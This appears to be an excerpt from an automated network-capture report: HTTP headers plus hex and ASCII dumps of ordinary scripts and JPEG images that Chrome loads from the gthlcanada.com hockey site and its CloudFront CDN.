                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 6d 65 3a 7b 66 75 74 75 72 65 3a 22 c4 8d 65 7a 20 25 73 22 2c 70 61 73 74 3a 22 70 72 65 64 20 25 73 22 2c 73 3a 46 64 2c 6d 3a 46 64 2c 6d 6d 3a 46 64 2c 68 3a 46 64 2c 68 68 3a 46 64 2c 64 3a 46 64 2c 64 64 3a 46 64 2c 4d 3a 46 64 2c 4d 4d 3a 46 64 2c 79 3a 46 64 2c 79 79 3a 46 64 7d 2c 6f 72 64 69 6e 61 6c 50 61 72 73 65 3a 2f 5c 64 7b 31 2c 32 7d 5c 2e 2f 2c 6f 72 64 69 6e 61 6c 3a 22 25 64 2e 22 2c 77 65 65 6b 3a 7b 64 6f 77 3a 31 2c 64 6f 79 3a 37 7d 7d 29 2c 75 66 2e 64 65 66 69 6e 65 4c 6f 63 61 6c 65 28 22 73 71 22 2c 7b 6d 6f 6e 74 68 73 3a 22 4a 61 6e 61 72 5f 53 68 6b 75 72 74 5f 4d 61 72 73 5f 50 72 69 6c 6c 5f 4d 61 6a 5f 51 65 72 73 68 6f 72 5f 4b 6f 72 72 69 6b 5f 47 75 73 68 74 5f 53 68 74 61 74 6f 72 5f 54 65 74 6f 72 5f 4e c3 ab 6e 74
                                                                                                                          Data Ascii: me:{future:"ez %s",past:"pred %s",s:Fd,m:Fd,mm:Fd,h:Fd,hh:Fd,d:Fd,dd:Fd,M:Fd,MM:Fd,y:Fd,yy:Fd},ordinalParse:/\d{1,2}\./,ordinal:"%d.",week:{dow:1,doy:7}}),uf.defineLocale("sq",{months:"Janar_Shkurt_Mars_Prill_Maj_Qershor_Korrik_Gusht_Shtator_Tetor_Nnt


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          55192.168.11.2049864137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC439OUTGET /app/themes/base/bower_components/jsTimezoneDetect/jstz.min.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:17 UTC520INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 5566
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 25 Feb 2014 15:53:03 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417858 960893452
                                                                                                                          Age: 83
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"530cbc5f-15be"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:17 UTC5566INData Raw: 2f 2a 21 20 6a 73 54 69 6d 65 7a 6f 6e 65 44 65 74 65 63 74 20 2d 20 76 31 2e 30 2e 36 20 2d 20 32 30 31 34 2d 30 32 2d 32 35 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 22 73 22 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 2d 61 2e 67 65 74 54 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 28 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 62 3f 62 3a 30 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 6e 65 77 20 44 61 74 65 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 61 26 26 64 2e 73 65 74 46 75 6c 6c 59 65 61 72 28 61 29 2c 64 2e 73 65 74 4d 6f 6e 74 68 28 62 29 2c 64 2e 73 65 74 44 61 74 65
                                                                                                                          Data Ascii: /*! jsTimezoneDetect - v1.0.6 - 2014-02-25 */!function(a){var b=function(){"use strict";var a="s",c=function(a){var b=-a.getTimezoneOffset();return null!==b?b:0},d=function(a,b,c){var d=new Date;return void 0!==a&&d.setFullYear(a),d.setMonth(b),d.setDate


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          56192.168.11.2049863137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC597OUTGET /wp/wp-includes/js/wp-embed.min.js?ver=4.5.3 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:17 UTC519INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 1403
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Sat, 11 Feb 2017 06:10:05 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971153 961417557
                                                                                                                          Age: 83
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"589eaabd-57b"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:17 UTC1403INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 69 66 28 21 65 29 7b 65 3d 21 30 3b 76 61 72 20 61 2c 63 2c 64 2c 66 2c 67 3d 2d 31 21 3d 3d 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 56 65 72 73 69 6f 6e 2e 69 6e 64 65 78 4f 66 28 22 4d 53 49 45 20 31 30 22 29 2c 68 3d 21 21 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 54 72 69 64 65 6e 74 2e 2a 72 76 3a 31 31 5c 2e 2f 29 2c 69 3d 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 66 72 61 6d 65 2e 77 70 2d 65 6d 62 65 64 64 65 64 2d 63 6f 6e 74 65 6e 74 22 29 3b 66 6f 72 28 63 3d 30 3b 63 3c 69 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 64 3d 69 5b 63 5d 2c 21 64 2e 67 65 74 41 74 74
                                                                                                                          Data Ascii: !function(a,b){"use strict";function c(){if(!e){e=!0;var a,c,d,f,g=-1!==navigator.appVersion.indexOf("MSIE 10"),h=!!navigator.userAgent.match(/Trident.*rv:11\./),i=b.querySelectorAll("iframe.wp-embedded-content");for(c=0;c<i.length;c++)if(d=i[c],!d.getAtt


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          57192.168.11.2049865137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC446OUTGET /app/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=4.5.3 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:17 UTC518INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 327
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971155 961417554
                                                                                                                          Age: 83
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-147"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:17 UTC327INData Raw: 0a 69 63 6c 5f 6c 61 6e 67 20 3d 20 69 63 6c 5f 76 61 72 73 2e 63 75 72 72 65 6e 74 5f 6c 61 6e 67 75 61 67 65 3b 0a 69 63 6c 5f 68 6f 6d 65 20 3d 20 69 63 6c 5f 76 61 72 73 2e 69 63 6c 5f 68 6f 6d 65 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 61 64 64 4c 6f 61 64 45 76 65 6e 74 28 66 75 6e 63 29 20 7b 0a 20 20 76 61 72 20 6f 6c 64 6f 6e 6c 6f 61 64 20 3d 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3b 0a 20 20 69 66 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 21 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 3b 0a 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 69 66
                                                                                                                          Data Ascii: icl_lang = icl_vars.current_language;icl_home = icl_vars.icl_home;function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function() { if


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          58192.168.11.204986654.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC671OUTGET /app/uploads/gthl/2024/12/17102800/Player-Movement-Website-Graphic-730x410.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 60817
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Tue, 17 Dec 2024 15:28:02 GMT
                                                                                                                          ETag: "5253271f085dadf8889f2833ee750ec6"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 90ad2a23a8617490c9d13e1f260633f8.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: VRt2bX9KhP63RnEexdiIkQVFvBK5Q0DmEGbgAvmD8DBrzNcLTfnYQg==
                                                                                                                          2025-01-13 21:01:17 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9a 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 09 01 03 04 08 02 05 07 06 0a ff c4 00 6d 10 00 01 02 05 02 03 04 03 09 0b 06 07 0a 0a 06 0b 01 02 03 00 04 05 06 11 07 12 08 21 31 13 22 41 51 09 14 61 15 16 32 52 71
                                                                                                                          Data Ascii: JFIF&&CC"m!1"AQa2Rq
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: f9 41 b8 79 eb eb 37 37 ec 55 fd a8 b2 ff 00 1f fc 3d 3a 41 f5 ab 98 60 7f e6 45 fd a8 8d 38 44 6b 5a fe af 80 5e 08 f9 3c b8 d4 f9 97 74 92 7f bf e7 87 bf e9 77 37 ec 45 7d b8 a7 df f3 c3 df f4 bb 9f f6 22 be dc 46 cc 21 ad 2b fa be 1f 72 79 a4 e4 ff 00 4d 4f 99 77 49 26 fb fe 78 7b fe 97 73 7e c4 57 db 8f a8 d3 7e 2d b4 5f 54 ee b9 6b 2e da aa d4 d9 aa 4e 21 6a 96 44 fd 3d 52 c8 79 49 19 2d a5 44 90 56 46 48 4f 8e 0e 22 2c 62 f4 8c f4 ed 32 76 5e a5 4d 9b 76 56 6e 51 d4 3f 2e fb 4a da b6 9c 49 05 2b 49 f0 20 80 44 4c 73 4a c9 ad 24 ac 59 c4 78 22 c9 27 46 51 a1 39 c6 76 76 6e 49 a4 f8 5d 68 ab ae 9d a8 9b 46 26 36 61 0e 1c a3 c3 d9 fc 23 e4 f5 67 57 6d 6d 18 b7 59 ba ae f9 5a b2 e9 6e cc 26 59 6f d3 e4 8c c8 65 6a 1d c2 e6 08 da 95 1e 40 f4 ce 07 52 33
                                                                                                                          Data Ascii: Ay77U=:A`E8DkZ^<tw7E}"F!+ryMOwI&x{s~W~-_Tk.N!jD=RyI-DVFHO",b2v^MvVnQ?.JI+I DLsJ$Yx"'FQ9vvnI]hF&6a#gWmmYZn&Yoej@R3
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 43 64 a1 b5 4b b9 87 37 15 ed 4f 20 46 4f 58 8e 9b 06 81 a7 f6 75 bf a7 d7 a6 a1 e9 7c 9d cb a8 73 ad aa fd 9d ac cd 4f 3e d4 da 67 e6 66 1c 76 45 2f 8c 94 3a c8 69 2c ba a6 94 90 49 50 3b 86 48 3d c5 fa d5 ad 37 79 54 64 b5 4f 48 ac bb c2 b3 44 a9 ba c2 aa 93 72 8e 49 cd 4c ad 97 08 4a a6 17 28 a6 d3 32 95 04 a4 9e d1 24 a8 1e 67 9c 7c f5 c5 5b aa dd f5 ca b5 76 bd 71 c8 d3 36 ca bb 5b ae d7 27 18 2a 97 a6 48 a1 68 6b 7a 58 6f 05 c5 95 2d a6 18 97 46 02 94 52 9c a5 29 26 39 dc 46 6b 2c 52 8d 0c 1d d4 db e3 c2 c7 a8 65 7c 8d a5 94 3a 99 86 7a e3 2c 3c 63 75 66 de 93 76 b3 e0 fd 9d 2d ae 07 41 77 5c f7 1d b5 63 6a 76 a3 db f5 27 d9 bb 69 b2 94 69 69 5a a3 6b c4 d4 8c bd 46 6a 64 4f cd 32 7a b6 b7 14 d3 0c 97 93 cd 21 c2 90 46 f8 d5 8b 33 5a f5 32 c9 be 24
                                                                                                                          Data Ascii: CdK7O FOXu|sO>gfvE/:i,IP;H=7yTdOHDrILJ(2$g|[vq6['*HhkzXo-FR)&9Fk,Re|:z,<cufv-Aw\cjv'iiiZkFjdO2z!F3Z2$
                                                                                                                          2025-01-13 21:01:17 UTC12152INData Raw: f6 ba 69 f3 d4 ea 6d b5 21 4c 97 4d 65 ea a3 13 89 7d 5b a6 67 dd 75 08 94 5a 7b 47 a7 5f 79 6a 21 47 92 51 cc c5 ac 36 0a be 1b 0f 36 95 ea 4b d7 ff 00 7d a5 34 e8 ce 9d 39 75 99 d8 56 a4 27 eb ec 26 d5 a5 53 ea 93 f5 2b 84 b9 23 2d 2d 4b 43 6a 99 59 2d a9 6e 29 3d a1 4a 00 4b 68 5a 94 a5 10 00 04 c6 58 67 5d f4 f6 d1 45 56 76 8b 71 bb 47 b2 65 bd 62 56 7a a3 42 b7 2a af d0 e5 83 83 68 96 75 6b 71 d6 1b 4b 8a 4e c4 a7 21 2a 20 24 08 e9 65 67 e9 97 39 9d b4 ac ab fa d9 ba 6f bb e2 5d ab 26 dd a7 db 69 9e 98 12 6d 4f be 9f 74 67 9f 5b ec 34 12 04 bb 61 a1 b7 3d d7 5c 27 00 18 c5 76 d7 d3 dd 26 9e d5 0d 31 9e b8 ad cb 16 e0 66 f8 95 92 7a 9b 71 89 e6 d3 31 42 a7 a4 b9 2e b6 dd 65 87 4a 84 c4 cf 64 f2 c7 21 86 91 8c 82 31 77 05 80 9e 1e 86 d6 d4 9f 04 d7 b8
                                                                                                                          Data Ascii: im!LMe}[guZ{G_yj!GQ66K}49uV'&S+#--KCjY-n)=JKhZXg]EVvqGebVzB*hukqKN!* $eg9o]&imOtg[4a=\'v&1fzq1B.eJd!1w


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          59192.168.11.204986754.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC446OUTGET /app/uploads/gthl/2025/01/07211622/DECAAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 28446
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Wed, 08 Jan 2025 02:16:23 GMT
                                                                                                                          ETag: "63bd1e837569dda67bb8266e8faefb23"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 65e185f36e65abff9322e261be3491d4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: SBQk-f4chTp_UVShC5L4yXWWU0SYGnPbCcNeFETLmPFIelNfeifx2A==
                                                                                                                          2025-01-13 21:01:17 UTC14588INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 01 02 04 06 05 07 08 03 09 0a ff c4 00 5a 10 00 01 03 02 03 04 03 09 09 0b 07 0b 04 03 01 00 00 01 02 03 04 05 06 11 31 07 12 21 51 08 13 41 14 16 22 57 61 71 92 93 e1
                                                                                                                          Data Ascii: JFIF&&CC"Z1!QA"Waq
                                                                                                                          2025-01-13 21:01:17 UTC13858INData Raw: 4f 2d 35 b6 79 e0 7e eb d8 dc da bc b8 98 38 3f 14 52 62 db 33 6e 54 d9 36 46 3d d0 cf 1e 7c 63 91 ab 92 a7 99 75 4f 22 9c f5 4a 6e 93 a8 be 2a 76 f4 9e b2 58 cc 34 31 ab 0b 27 6a b2 8b 6b ad 27 b6 dd 97 dd d7 7e 93 a6 76 bf 8c 6a 6a eb e5 b1 46 ae 8d c9 c2 74 d3 75 bd 8c fd ea 47 47 ef e5 8d 5f f7 07 fe db 0d 9b 6e 38 1f bb 69 13 16 db a1 ce 7a 66 ee d5 35 a9 c5 d1 f6 3b e4 fa 8d 67 a3 f7 f2 c6 af fb 83 ff 00 6d 87 b2 a7 52 8d 4c 96 7c 8a b5 96 de d3 f3 ce 27 09 98 61 3c 22 d0 58 f7 ad 79 a7 07 c1 c1 de d6 fb 6f d7 73 be 6e 7f 83 aa bf 42 ff 00 a8 eb 2d 8c 7e 1f c5 bf de 63 fa de 76 6d cf f0 75 57 e8 5f f5 1d 65 b1 8f c3 f8 b7 fb cc 7f 5b cf 3b 84 fe 47 11 ff 00 e7 fb 91 f5 ac fb ff 00 92 e5 7d b5 3f db 91 da 8f 91 91 ee ef b9 13 79 c8 d4 f3 a9 83 79 b2
                                                                                                                          Data Ascii: O-5y~8?Rb3nT6F=|cuO"Jn*vX41'jk'~vjjFtuGG_n8izf5;gmRL|'a<"XyosnB-~cvmuW_e[;G}?yy


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          60192.168.11.204986954.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC648OUTGET /app/uploads/gthl/2023/06/10112443/Nothers-Big-Box.jpeg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 51042
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Sat, 10 Jun 2023 15:24:44 GMT
                                                                                                                          ETag: "60e065ab96e4fa2c0ff0050a5f3d4a11"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 d5710f445906ae917df909d01c495c9e.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: oDvcexP4zCxdz55zwyHzxBEe3aA8JYkWArj_ce6noO4il64h0thDVQ==
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 48 00 48 00 00 ff e1 34 be 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 56 01 1b 00 05 00 00 00 01 00 00 00 5e 01 28 00 03 00 00 00 01 00 02 00 00 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 00 00 00 01 00 00 00 66 00 00 00 c0 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 07 90 00 00 07 00 00 00 04 30 32 32 31 91 01 00 07 00 00 00 04 01 02 03 00 a0 00 00 07 00 00 00 04 30 31 30 30 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 2c a0 03 00 04 00 00 00 01 00 00 00 fa a4 06 00 03 00 00 00 01 00 00 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 0e 01 1b 00 05 00 00 00
                                                                                                                          Data Ascii: JFIFHH4ExifMM*V^(ifHH02210100,
                                                                                                                          2025-01-13 21:01:17 UTC595INData Raw: 99 f1 56 b3 fb 40 7c 46 f1 16 b4 be 29 f8 5d a7 c3 71 e0 dd 2d 88 48 2e 53 65 ce be 9d 24 92 d9 db 1e 42 28 e6 06 60 7c e6 eb b5 08 35 f9 9e 75 e2 1e 43 93 66 94 f2 7c 53 72 93 76 a9 38 bb c6 8b e8 9a fb 4f f9 d2 f8 57 77 74 be 83 0b 92 63 31 38 69 62 a9 e8 96 c9 ef 2f f2 f2 ef e4 b5 3e aa f0 1f 8e fc 37 f1 1f c3 76 fe 29 f0 bd c1 9a d6 72 51 d1 d4 a4 d0 4c 9c 49 0c d1 9f 99 24 43 c3 29 e4 1f 6e 6b f4 e9 45 2b 4a 2d 38 b4 9a 69 dd 34 f6 69 ad 1a 7d 19 f3 da ea 9a d5 6e bb 1d 95 40 c2 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 0f 29 f8 f1 ff 00 24 3b e2 27 fd 8b 9a bf fe 91 cb 5e d6 4d ff 00 23 1c 37 f8 e1 ff 00 a5 23 c1 ce ff 00 e4 59 8a ff 00 af 73 ff 00
                                                                                                                          Data Ascii: V@|F)]q-H.Se$B(`|5uCf|Srv8OWwtc18ib/>7v)rQLI$C)nkE+J-8i4i}n@((((((()$;'^M#7#Ys
